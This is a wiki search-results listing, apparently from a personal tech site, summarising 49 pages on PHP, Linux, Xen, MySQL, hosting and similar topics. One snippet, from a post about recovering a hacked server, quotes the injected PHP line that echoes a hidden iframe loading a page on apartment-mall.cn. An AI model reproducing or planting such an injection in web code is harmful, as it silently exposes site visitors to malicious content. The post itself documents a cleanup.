2006-02-13
''Note: I've expanded this entry in article [[Configuration]].'' In a non-trivial project, several programming . . . a file that you include in a Makefile. But for a PHP script, this is a pain. This is where m4 comes . . .
1K - last updated 2006-03-20 20:10 UTC by 6615
2006-02-23 Pictures from TELIS Project
Some pictures from work, all related to the [http://www.sron.nl/index.php?option=com_content&task=view&id=99&Itemid=238&lang=en . . .
2K - last updated 2025-01-14 19:33 UTC by bartvk
2006-11-16 Checking form fields
When you're creating dynamic web pages with forms on them, you'll probably not forget to validate the . . . provide automatic checks for this. For instance, PHP's PEAR classes contain the [http://pear.php.net/HTML_QuickForm . . .
2K - last updated 2006-11-16 15:35 UTC by 6615
2007-05-16 Atari assembly
A colleague of mine did the following demo: http://www.youtube.com/watch?v=PbMH5FBVbl4 Here is the original . . . posting: http://www.pouet.net/user.php?who=3857 It's all handcoded assembly. An integrated . . .
1K - last updated 2007-05-16 07:27 UTC by bvankuik
2007-08-05 Adding salt to Auth class
If you're using PHP, you probably use or at least know of the PEAR classes at http://pear.php.net/. It's . . . Use the simple class below to add this. <?php include_once 'Auth.php'; include_once 'config.php'; . . . } ?> Save the above code in a file called MyAuth.php and instead of including Auth in your login script, . . . use MyAuth. Also create a file called config.php and add the variable $mysalt. It should contain . . .
2K - last updated 2007-08-05 08:08 UTC by 6615
2007-10-26 PEARs HTML QuickForm Controller goodness
I'm in the middle of coding up a multi-page wizard-style bunch of PHP pages. The MVC pattern is implicit . . . like it'd be useful to use the [http://pear.php.net/ PEAR] class [http://pear.php.net/manual/en/package.html.html-quickform-controller.php . . . In combination with [http://pear.php.net/package/HTML_QuickForm HTML_QuickForm] for . . . As the view, the PEAR package [http://pear.php.net/package/HTML_Template_IT HTML_Template_IT] . . . be seen in the HTML source, so I looked at the PHP code but I couldn't see the difference in the five . . .
3K - last updated 2007-10-27 07:39 UTC by 6615
2007-10-27 Thinking about wizards
In the previous post, I talked about how I was coding up a wizard-type bunch of screens, and was using . . . here as implemented by PEARs [http://pear.php.net/manual/en/package.html.html-quickform-controller.php . . .
2K - last updated 2007-10-27 08:46 UTC by 6615
2008-02-07 the WTF count
As inspired by the comic [http://www.osnews.com/story/19266/WTFs_m WTFs per minute], we'd thought that . . . string [http://www.urbandictionary.com/define.php?term=wtf WTF]. First, you need to locate the syntax . . .
1K - last updated 2008-02-08 09:29 UTC by 6615
2008-05-06 Recovering from a hacked server
A friend of mine had a problem with a server in which a particular PHP script kept changing, including . . . files, no funny scripts et cetera. In a bunch of PHP scripts, the following code was appended at the . . . echo '<iframe src="http://apartment-mall.cn/ind.php" width="1" height="1" alt="YTREWQhej2Htyu" style="visibility:hidden;position:absolute"></iframe>'; . . .
2K - last updated 2008-05-08 06:28 UTC by 6615
2008-06-19 Project SHAMROC
For [http://www.sron.nl/index.php?option=com_content&task=view&id=1531&Itemid=1394 project SHAMROC], . . .
2K - last updated 2008-07-01 11:28 UTC by 6615
2008-08-29 Fighting an ADC
We use an [http://en.wikipedia.org/wiki/Analog-to-digital_converter ADC] from Cirrus Logic on the DAC . . . that we used in the [http://www.sron.nl/index.php?option=com_content&task=view&id=71&Itemid=130 Telis] . . .
2K - last updated 2008-08-29 07:16 UTC by Bart
2009-08-28 PHP client using Thrift
Today I was thinking about a PHP script that uses Thrift to retrieve a couple of results. We have the . . . be taken: # Define Thrift definition # Generate PHP stubs (client side) # Rework these into script . . .
2K - last updated 2009-08-28 13:26 UTC by 6615
2010-10-14 Some highlights of AHS 2010
A colleague of mine recently went to [http://www.see.ed.ac.uk/ahs2010/ AHS 2010], a series of annual . . . electronics for the [http://www.sron.nl/index.php?option=com_content&task=view&id=2034&Itemid=1942 . . .
2K - last updated 2010-10-14 14:32 UTC by 6615
2011-09-21 From iPhone to Android
''This is part 7 of my series where I document going from an iPhone to Android 2.3, running on the Samsung . . . also [http://forum.xda-developers.com/showthread.php?t=1111414 the xda-developers forum for instructions . . .
3K - last updated 2011-09-26 21:19 UTC by 6615
2013-10-13 Extend drive space in your MacBook Air 2013
Recently I got a MacBook Air, but it wasn't within my budget to get the bigger SSD. The standard SSD . . . seen a [http://forums.macrumors.com/showpost.php?p=18271213&postcount=18 forum post that these are . . .
3K - last updated 2013-11-02 10:44 UTC by 6615
2013-10-25 What is new in OS X Mavericks
I'm running a little comparison of the file system of a Mavericks install and a Mountain Lion install, . . . * ArcMSR -- For [http://faq.areca.com.tw/index.php?option=com_quickfaq&view=items&cid=9:Mac&id=733:Q10081310 . . .
5K - last updated 2013-12-06 10:09 UTC by 6615
2013-12-20 Performance test of USB ethernet adapters on OS X
I've got two USB-based network adapters laying around here: the official [http://store.apple.com/us_smb_78313/product/MC704ZM/A/apple-usb-ethernet-adapter . . . based on the [http://www.asix.com.tw/products.php?op=pItemdetail&PItemID=131;71;112 Asix AX88179] . . .
2K - last updated 2013-12-20 08:29 UTC by 6615
Adjusting Starfighter
Reading source code is one of those things that I feel that nobody likes, while the advantages are so . . . [http://www.parallelrealities.co.uk/starfighter.php Starfighter] from the website of [http://www.parallelrealities.co.uk/ . . .
9K - last updated 2007-05-01 13:56 UTC by bvankuik
Bookmarks to check out sometime
* [http://openejb.codehaus.org/ OpenEJB], with an additional [http://www.onjava.com/pub/a/onjava/2003/02/12/ejb_tomcat.html . . . Art: * http://www.soasoas.com/gallery.php * Gifted painter: http://www.janneskleiker.nl/ . . .
1K - last updated 2006-08-03 14:26 UTC by 6615
Cheap VPS Hosting
(English readers: this is an overview of cheap Dutch VPS hosters) = Update 23-12-2013 = '''Update:''' . . . || ||[http://www.amenworld.nl/order/order.php Amen] ||NL ||Linux ||€11,90 ||N ||400Mb ||? ||Geen . . . FlexServers] ||NL ||Linux ||€16 ||50 ||2 ||64 ||Setup-kosten . . . || ||[http://www.freerider.nl/nieuw/index.php4?page=2.5.1 FreeRider] ||NL ||Linux ||€22,61 ||50 . . . per 50Gb || ||[http://vps.pigscanfly.ca/mini-pkg.php Pigs Can Fly] ||CA ||Linux ||$5 ||5 ||1 ||16 ||Absoluut . . .
12K - last updated 2013-12-23 10:48 UTC by 6615
Comments on 2006-10-03 Mod perl and Slackware
Note that the latest version of Apache that comes with Slackware 10.2 is 1.3.37 (published as a security . . . See: http://www.slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.610131 . . . 3 10:38:54 2006] [notice] Apache/1.3.33 (Unix) PHP/4.4.0 mod_perl/1.29 configured -- resuming normal . . .
3K - last updated 2006-10-04 09:19 UTC by bvankuik
Compaq ProLiant DL360
= Links = A good page on this piece of server by Andew McNabb: http://www.mcnabbs.org/andrew/linux/proliant/ . . . http://www.strocamp.net/opensource/cpqarrayd.php = My configuration = Single P3 1000 MHz, 133 MHz . . .
2K - last updated 2007-07-06 16:26 UTC by 6615
Configuration
= Generating a config file = In a non-trivial project, several programming languages will often be used. . . . is bolted onto the application and it's coded in PHP. Some scripts in Perl are added for thrumming through . . . is actually valid Python syntax. == Usage in PHP == Put the following function in a general source . . . file (let's call it "utils.php"): /* This function reads the configuration file . . . define($name, $value); } On top of every PHP script, add the following lines: include_once 'utils.php'; . . .
8K - last updated 2006-10-20 14:09 UTC by bvankuik
DNS links
* http://zor.in/ * http://www.nxs.nl/ * http://www.dnstools.nl/ * http://www.je-eigen-domein.nl/ * http://www.enom.com . . . * http://www.tweakhosting.nl/domeinregistratie.php * http://www.domein.org/stappenplan.htm * http://www.domeinnaamreseller.nl/ . . .
1K - last updated 2006-08-10 06:32 UTC by 6615
Debian
= Package tools = == dpkg-query == This command is meant to query the package database. Some examples: . . . scripts but [http://ubuntuforums.org/showthread.php?t=1885744 this post on the Ubuntu forum] provides . . .
6K - last updated 2014-01-10 12:17 UTC by 6615
Debian Sarge on Xen backup copy
Quick instructions for installing a Debian Sarge VM on Xen http://wiki.xensource.com/xenwiki/DebianSarge . . . Retrieved from "http://mark.foster.cc/wiki/index.php/Debian_Sarge_on_Xen" . . .
3K - last updated 2006-09-24 13:52 UTC by 6615
DutchVirtual
= dv1 configuration notes = * eth1 has IP address 192.168.0.253 * Disks are in s/w raid, partition 1 . . . flash * Ruby * charlie: problem in panel_new_vps.php * bravo: Fix problem where eth0 doesn't come up . . .
5K - last updated 2008-08-15 10:01 UTC by Bart
Eclipse
[http://simplygenius.com/geekblog/2005/04/08/1112982083849.html Painless Eclipse upgrades under Linux] . . . * The [http://sourceforge.net/project/showfiles.php?group_id=142064&package_id=160236 CxxTestPlugin . . . Frameworks] page at C2 [[EPIC]] for Perl [[PHPEclipse]] for PHP [http://www.eclipse.org/webtools/wst/main.html . . .
1K - last updated 2006-02-28 15:58 UTC by 6615
Explanation
I'm glad you enjoy the picture. 1. The woman is my friend and coworker, India Branker. See attached for . . . <http://www.dpchallenge.com/challenge_results.php?CHALLENGE_ID=194>. I actually preferred the image . . .
1K - last updated 2006-09-14 09:36 UTC by 6615
House pictures
[http://www.veilinghaven.nl/forum/read.php?9,536 26 juli 2006] [[Lijstje.jpg]] [[Cat]] [[Coffee]] . . .
1K - last updated 2010-01-04 09:42 UTC by 6615
Internationalization
== WARNING WORK IN PROGRESS == == "Geïrriteerd" == Are you a West-European software developer who: # . . . * Talk about clipboards copy/paste * Mention PHP its Strings aren't Unicode by default * Do testing . . .
10K - last updated 2005-12-04 15:35 UTC by 6615
Law related to IT links
* [http://www.ictrecht.nl/ ICTRecht] Law firm specialized in IT. * [http://www.domjur.nl/ DomJur] Jurisprudence . . . * http://www.webhostingtalk.nl/showthread.php?threadid=57969 * http://www.kellysearch.nl/ * [http://www.novagraaf.nl/ . . .
1K - last updated 2005-11-16 08:21 UTC by 6615
MySQL
= Installation = Install as usual for your distribution. For Debian, this means: $ sudo apt-get install . . . phpmyadmin == Setting passwords == After installation . . . a typo in the database name. == New database for phpMyAdmin == To create a new database and new user . . . for phpMyAdmin: mysql> create database phpmyadmin; mysql> . . . GRANT ALL PRIVILEGES ON phpmyadmin.* TO 'phpmyadmin'@'localhost' IDENTIFIED . . .
8K - last updated 2023-01-30 09:45 UTC by bartvk
Other links
* Bikes: ** http://www.nieuwendijktweewielers.nl/default.asp?pid=127 ** http://www.harrygeurtstweewielers.nl/docs/aanbiedingen.php . . . ** https://www.e-cumlaude.com/secure/p/KWFcollecte/index.php . . . Prince of Persia (Flash)] * Fonts: ** http://www.proggyfonts.com . . .
2K - last updated 2006-08-02 06:47 UTC by 6615
PHP
= Standard Packages = Use the PEAR classes, http://pear.php.net/ = Secure programming = Check out the . . . [http://www.securephpwiki.com/index.php/Main_Page SecurePHP] wiki. = . . . = Some examples of using regular expressions in PHP. Replacing strings using a regex. Below removes . . . we'll have to set the current date and time from PHP: $query = "update logfile set message = $logmsg, . . .
2K - last updated 2009-02-13 20:15 UTC by 6615
PHPEclipse
Homepage: [http://www.phpeclipse.de/tiki-view_articles.php PHPEclipse] Some shortcomings: * Matching . . .
1K - last updated 2006-02-01 07:29 UTC by 6615
Performance
The subject is: performance measurement of a Linux server. = Measuring bandwidth = First, create a file . . . file looks as follows: fastcgi.server = ( ".php" => ( "localhost" => ( "socket" => "/var/run/lighttpd/php-fastcgi.socket", . . . "bin-path" => "/usr/bin/php-cgi", "max-procs" => 2, ) ) ) * If you want user . . . the permissions correctly for the PID files of PHP: # sudo mkdir /var/run/lighttpd # sudo chown lighttpd:lighttpd . . . /var/run/lighttpd Also, PHP needs to be able to write session files, so set . . .
6K - last updated 2013-12-20 08:02 UTC by 6615
Privacy links
Nederlands (Dutch): * [http://www.infofilter.nl/InfoWWW/php/do_home.php InfoFilter, om direct marketing . . .
1K - last updated 2006-01-29 19:10 UTC by 6615
Programmable logic
= Basic steps = * VHDL or Verilog code, i.e. a "core" * Test using simulation * Set up input signal and . . . * http://wiki.duskglow.com/tiki-index.php?page=Open-Graphics . . .
1K - last updated 2006-07-30 07:57 UTC by 6615
Python presentation
What is Python? * Scripting language, invented in 1991 at CWI (Amsterdam) as a scientific programming . . . Web app scripting not like you expect; it's not PHPish but more like Java's servlets Interesting developments . . .
2K - last updated 2008-12-12 09:35 UTC by 6615
SSH
= Create a VNC tunnel to work = Suppose your home and organization's network looks like this: +-----Organization-Network-----+ . . . can happen when using SSH from a script (Perl, PHP) which is run through Apache or some other web . . .
7K - last updated 2008-11-14 09:17 UTC by 6615
SVN
I've written about the differences between SVN and CVS and the usage of the plugins in Eclipse, see also . . . M themes/Outlet/style/style.css M includes/meta.php M modules/Outlet/language/lang-dutch.php M modules/Outlet/index.php . . . M modules/Outlet/functions.php A issues/keywords_issue.sql = Creating a new project . . .
17K - last updated 2014-04-11 10:18 UTC by 6615
Software RAID
= Testing and setting up RAID-1 = Install a minimal and configure with RAID-1, with a small RAID-1 partition . . . = * [http://www.webhostingtalk.nl/showthread.php?s=&threadid=77090&perpage=15&highlight=raid%20and%20linux&pagenumber=2 . . .
6K - last updated 2007-08-10 14:43 UTC by 6615
UMTS links
* [http://slashdot.org/comments.pl?sid=50773&cid=5086905 Slashdot Insightful comment about WiFi not squashing . . . UMTS tutorial] * [http://en.wikipedia.org/wiki/W-CDMA . . .
1K - last updated 2005-10-16 16:13 UTC by 6615
Vim
[http://www.moolenaar.net/habits.html Tips from Bram], be sure to read them. = Interaction with X = Vim . . . CTRL-t. See also [http://www.vim.org/tips/tip.php?tip_id=94 Tip 94 - Questions & Answers about using . . . that: [AutoTag http://www.vim.org/scripts/script.php?script_id=1343]. Download the .vim file and place . . .
9K - last updated 2014-12-12 08:11 UTC by 6615
Xen
= Tips = == Mounting == If you do a straight install of CentOS to an image with <tt>virt-manager</tt>, . . . Xen Networking http://mark.foster.cc/wiki/index.php/Debian_Sarge_on_Xen ([[Debian_Sarge_on_Xen_backup_copy]]) . . .
3K - last updated 2011-09-29 09:58 UTC by 6615
Xen on Debian installation notes
= Packages = Install the following packages: sudo make gcc less libc6 libc6-dev bzip2 patch zlib And . . . = http://www.fedoraforum.org/forum/showthread.php?t=2921&page=5 http://www200.pair.com/mecham/raid/raid1-page3.html . . .
1K - last updated 2007-06-08 10:59 UTC by 6615
macOS
= The Library folder = Since uninstalling Mac apps consists of dragging the .app folder to the trash, . . . this link: [http://hints.macworld.com/article.php?story=201106020948369 How to disable virtual memory] . . . Mac OS X hint: http://hints.macworld.com/article.php?story=20030508130108314 More via your favorite . . .
7K - last updated 2017-06-22 06:24 UTC by 6615
vankuik.nl
= Latest weblog entries = <journal 5> = Weblog Archive = [[Weblog_entries_2024]] [[Weblog_entries_2023]] . . . one format and use it in Makefiles, C, Perl and PHP * [[Cheap_VPS_Hosting]] (Dutch) Een vergelijking . . . * [[IDL]] * [[Objective-C]] * [[Perl]] * [[PHP]] * [[Python]] * [[MySQL]] but mostly the administrative . . .
4K - last updated 2024-04-16 10:29 UTC by bartvk
49 pages found.